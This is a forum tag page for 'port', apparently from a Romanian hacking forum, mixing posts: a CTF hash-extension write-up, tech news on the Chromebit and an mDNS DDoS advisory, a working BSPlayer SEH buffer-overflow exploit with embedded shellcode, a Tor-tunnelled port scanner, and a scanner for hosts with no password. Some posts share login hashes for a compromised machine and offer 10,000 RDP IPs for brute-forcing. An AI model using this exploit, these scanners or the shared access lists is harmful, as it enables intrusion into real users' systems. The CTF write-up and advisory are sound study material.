Search the Community
Showing results for tags 'port'.
-
110.36.171.26 port 21 are parola hmm ce facem? nu ne complicam prea tare ca are si port 23 cate foi puteti scoate la imprimanta? put <filename> [portx] P.S port 23 user: 04485d2082506a18120af551f6792fc6 pass: 0ec1b49bd4b8a812f5903961888407bf si e ptr ultima oara cand refac parola la el cine o mai schimba sa-l pastreze
- 4 replies
-
- complicam
- imprimanta
-
(and 3 more)
Tagged with:
-
As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote) The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name). You can download the original level here (Python). # python2 pleaseimport sys import struct import hashlib import os from binascii import hexlify, unhexlify import SocketServer import socket try: from fw import allow except ImportError: def allow(ip,port): print 'allowing host ' + ip + ' on port ' + str(port) PORT = 8008 g_h = hashlib.sha512 g_key = None def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m def parse_and_verify(h, k, m): ds = h().digest_size if len(m) < ds: return None mac = m[:ds] msg = m[ds:] if h(k+msg).digest() != mac: return None port_list = [] for i in range(0,len(msg),2): if i+1 >= len(msg): break port_list.append(struct.unpack_from('!H', msg, i)[0]) return port_list class KnockersRequestHandler(SocketServer.BaseRequestHandler): def handle(self): global g_key data, s = self.request print 'Client: {} len {}'.format(self.client_address[0],len(data)) l = parse_and_verify(g_h, g_key, data) if l is None: print 'bad message' else: for p in l: allow(self.client_address[0], p) class KnockersServer(SocketServer.UDPServer): address_family = socket.AF_INET6 def load_key(): global g_key f=open('secret.txt','rb') g_key = unhexlify(f.read()) f.close() def main(): global g_h global g_key g_h = hashlib.sha512 if len(sys.argv) < 2: print '''Usage: --- Server --- knockers.py setup Generates a new secret.txt knockers.py newtoken port [port [port ...]] Generates a client token for the given ports knockers.py serve Runs the service --- Client --- knockers.py knock <host> <token> Tells the server to unlock ports allowed by the given token ''' elif sys.argv[1]=='serve': load_key() server = KnockersServer(('', PORT), KnockersRequestHandler) server.serve_forever(); elif sys.argv[1]=='setup': f = open('secret.txt','wb') f.write(hexlify(os.urandom(16))) f.close() print 'wrote new secret.txt' elif sys.argv[1]=='newtoken': load_key() ports = map(int,sys.argv[2:]) print hexlify(generate_token(g_h, g_key, *ports)) elif sys.argv[1]=='knock': ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM) if len(ai) < 1: print 'could not find address: ' + sys.argv[2] return family, socktype, proto, canonname, sockaddr = ai[0] s = socket.socket(family, socktype, proto) s.sendto(unhexlify(sys.argv[3]), sockaddr) else: print 'unrecognized command' if __name__ == '__main__': main() The vulnerability To track down the vulnerability, let's have a look at the signature algorithm: def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below). Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability! I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port! Let's see how! Generating a legit token To use the python script linked above, first run 'setup': $ python ./knockers.py setup wrote new secret.txt Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's: $ cat secret.txt 2b396fb91a76307ce31ef7236e7fd3df Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80: $ python ./knockers.py newtoken 80 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first! We start the server: $ python ./knockers.py serve And in another window, or on another host if you prefer, send the generated token: $ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 In the original window, you'll see that it was successful: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Now, let's figure out how to create a token for port 7175! Generating an illegit (non-legit?) token So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack! Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw). All said and done, here's the command: ./hash_extender --data-format hex --data 0050 \ --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \ --append "1c07" --append-format hex \ -l 16 You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that. $ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16 Type: sha512 Secret length: 16 New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894 New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 [strike] Type: whirlpool Secret length: 16 New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659 New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07[/strike] Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them: $ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 And checking our server, we see a ton of output, including successfully opening port 7175: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Client: ::1 len 178 allowing host ::1 on port 80 allowing host ::1 on port 32768 allowing host ::1 on port 0 allowing host ::1 on port 0 [...repeated like 100 times...] allowing host ::1 on port 0 allowing host ::1 on port 0 allowing host ::1 on port 144 allowing host ::1 on port 7175 And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key. Source skullsecurity
-
Imagine — reaching into your pocket — and pulling out a computer! Google has made it possible to put your whole computer into your pocket by introducing a whole new kind of Chrome device — a tiny stick that plugs into HDMI port of any display. Dubbed ChromeBit, a fully featured computer-on-a-stick from Asus that Google promises to retail for less than $100 when it comes out this summer. You just need to plug a Chromebit right into your TV or any monitor in order to turn it into a full-fledged Chrome OS-based computer. Google Chromebit is portable with an impressive look and will be available in three attractive colors — silver, blue and orange. It has a smarter clinch on the business end so that a user can easily plug it into practically any HDMI port without the need of any extension cable. SPECIFICATIONS This tiny little Google ChromeBit stick packaged with: Rockchip RK3288 (with quad-core Mali 760 graphics) 2GB of RAM 16GB of solid state storage memory a single full-size USB 2.0 port Bluetooth 4.0 Smart Ready controller WiFi 802.11 ac support ARM Mali 760 quad-core GPU Although Google Chromebit will not be the most powerful computer you could plug into your TV, it should not be too bad for the browser-based operating systems. Google believes that Chromebit will be of great use in schools and small businesses due to its price and easy manageability. $149 CHROMEBOOK In addition to Chromebit, Google also announced several cheap Chrome devices, including Haier Chromebook 11 (available online at Amazon) and Hisense Chromebook (available at Walmart). Both are 11.6-inch Chromebooks will be available at $149, making them cheaper and affordable than most smartphones. The basic specifications for the Haier and Hisense Chromebooks are essentially the same with 2GB of RAM, feature two USB ports, 16GB solid flash storage, SD Card reader and HDMI output, as well as 720p webcam and WiFi and Bluetooth antennas. $249 CHROMEBOOK FLIP The technology giant also announced that ASUS plans to launch a new "Chromebook Flip" convertible with the same internals later this spring for $249. Chromebook Flip will come with a 10.1-inch touchscreen display that flips all the way around so the device can be used in tablet mode. Source
-
- chromebit
- chromebook
-
(and 3 more)
Tagged with:
-
The Department of Homeland Security sponsored CERT at Carnegie Mellon University on Tuesday released an advisory warning infrastructure providers of a vulnerability in Multicast DNS, or mDNS, that could leak device information that could be leveraged in high volume DDoS amplification attacks. “I would say the most serious concern with a vulnerability like this is abuse for DDoS campaigns, since it’s using UDP (easily spoofable) and the amplification in most cases is well over 100 percent,” said security researcher Chad Seaman, who reported the vulnerability. “We’ve seen a huge surge in the abuse of SSDP devices being used in reflection attacks, this is along the same lines and offers greater amplification, but luckily there aren’t nearly as many vulnerable mDNS devices in the wild.” The advisory lists a number of vendors whose devices are affected, including Canon, HP and IBM among others. Cisco, D-Link and Microsoft devices are in the clear, while whether Apple, a number of Linux distributions, and Dell devices are affected. Mostly, mDNS is used in consumer devices to simplify configuration and integration of services and networking, Seaman said. The issue is that mDNS devices could respond to unicast queries from outside a local link network and those responses could include network and device data that would facilitate a large-scale DDoS attack. According to the advisory, mDNS enables devices on a local link network to discover other services and devices. The fact that some devices would respond to unicast queries from outside goes against the implementation recommendations in RFC 6762. “It’s very easy to abuse. It’s little more than running a standard DNS query for a specific string/service name on port 5353. If you get a reply to the most generic query, the machine is accepting input over the WAN interface that it shouldn’t be,” Seaman said. The leaked information depends on the particular device and how the service it supports is configured. The useful information includes device names, model numbers, serial numbers, network configuration information, and more. “These could be used for social engineering attacks, targeting purposes, reconnaissance purposes, etc.,” Seaman said. The CERT advisory recommends either blocking inbound and outbound mDNS on the WAN, or disabling mDNS services. As with other noteworthy amplification attacks, large amounts of bad traffic is pointed at a specific online service, in most cases, over-running it in short order. “As a reflector it would just be a high number of incoming DNS queries targeted at port 5353, likely from a spoofed source to achieve reflection. As a victim you would see a wide array of replies coming back from various devices,” said Seaman, who has posted sample traffic signatures that would be similar to those used in such an attack. “However because of mDNS explicitly stating it should only operate on port 5353 in the RFC, all requests will be sourced from port 5353 during the reflection. Meaning mitigation should be as simple as blocking port 5353 to protect vulnerable internal devices and drop incoming traffic sourced from port 5353 to help mitigate an attack.” Source
-
#!/usr/bin/python ''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full address and then used backward jumping to jump to a long jump that eventually land in my shellcode. Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try My twitter: @fady_osman My youtube: [url]https://www.youtube.com/user/cutehack3r[/url] ''' import socket import sys s = socket.socket() # Create a socket object if(len(sys.argv) < 3): print "[x] Please enter an IP and port to listen to." print "[x] " + sys.argv[0] + " ip port" exit() host = sys.argv[1] # Ip to listen to. port = int(sys.argv[2]) # Reserve a port for your service. s.bind((host, port)) # Bind to the port print "[*] Listening on port " + str(port) s.listen(5) # Now wait for client connection. c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload first time', addr)) c.recv(1024) #seh and nseh. buf = "" buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31" buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a" buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94" buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01" buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5" buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7" buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f" buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7" buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34" buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80" buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3" buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5" buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5" buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c" buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15" buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c" buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22" buf += "\x8c\xcd\x11\xc2\x37\x12" jmplong = "\xe9\x85\xe9\xff\xff" nseh = "\xeb\xf9\x90\x90" # Partially overwriting the seh record (nulls are ignored). seh = "\x3b\x58\x00\x00" buflen = len(buf) response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 c.send(response) c.close() c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload second time', addr)) c.recv(1024) c.send(response) c.close() s.close() Source
-
365 Days FREE VPN ll Port Support Free VPN Client Software | Free VPN Proxy | Free VPN Download
-
# tmap 0.1 # Coded by TheKingOf9x <AT> yandex . com # Fast multi-threaded port scanner which tunnels through TOR. # Depends on the PySocks library: https://github.com/Anorov/PySocks # And of course TOR: apt-get install tor # # Do not use hostnames, may leak DNS info. only use IP addresses. # # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this. # # Usage: # python tmap.py import sys import socks import datetime import threading lock = threading.Semaphore(value = 1) #Port of TOR server TOR_PORT = 9050 #timeout. Experiment with this. TIMEOUT = 20 #Port list to scan, ammend at will ports = (21,22,23,80,443,1433,3306,8080) def main(): if len(sys.argv) < 3: print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m") print("Single host scan:\npython " + sys.argv[0] + " -s 192.168.0.1\n") print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n") print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n") exit(0) scan_type = sys.argv[1] parameter = sys.argv[2] filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap") try: log = open(filename, "a") except: pass if scan_type == "-s": host_scan(parameter, log) elif scan_type == "-r": range_scan(parameter, log) elif scan_type == "-l": list_scan(parameter, log) else: exit(1) #main connect function def connect(ip, port, log): try: s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', TOR_PORT) s.settimeout(TIMEOUT) s.connect((ip, port)) output = ip + ":" + str(port) lock.acquire() # Lock/unlock to clean up screen output. print(output) try: log.write(output + "\n") except: pass except: pass finally: lock.release() def host_scan(ip, log): ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass def range_scan(ip, log): ip = ip.strip() for i in range(1, 255): ip_addr = ip + "." + str(i) for port in ports: try: t = threading.Thread(target=connect, args=(ip_addr, port, log)) t.start() except: pass def list_scan(parameter, log): try: f = open(parameter, 'r') except: print("Could not open file: " + parameter) exit(1) for ip in f: ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass if __name__ == '__main__': main() Download Source
-
#!/usr/bin/env python """ Scanner pentru orice cu o adresa IP si care nu are parola && user (sper sa-i fie de folos cuiva) """ import sys import socket import struct raw_ip = raw_input("Enter the starting IP address: ") port = raw_input("Enter the port you want to scan: ") ip_number = raw_input("Enter the numer of IPs you want to scan: ") print "Working..." ip2int = lambda ipstr: struct.unpack('!I', socket.inet_aton(ipstr))[0] int2ip = lambda n: socket.inet_ntoa(struct.pack('!I', n)) ip_number = int(ip_number) inted_ip = ip2int(raw_ip) i = 1 while i <= ip_number: if i == ip_number: print 'Job Done.' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((raw_ip, int(port))) if result == 0: f = open('list.txt', 'w') f.write(int2ip(inted_ip) + ':' + port + '\n') else: print "Nothing found." inted_ip+=i sock.close() except KeyboardInterrupt: print "Exiting..." sys.exit() except socket.error: print "Could not connect to the server. Exiting..." sys.exit() i += 1;
-
Cei care doriti sa dati brute dupa multiple ip si aveti nevoie de ip-uri postati aici, ce are legatura cu portul 3389(RDP) si voi posta eu. Proaspete: IP Country: Random Tip: RDP Port: 3389 Nr: 10.000 Data: Marti 14.09.2011 - Vizitati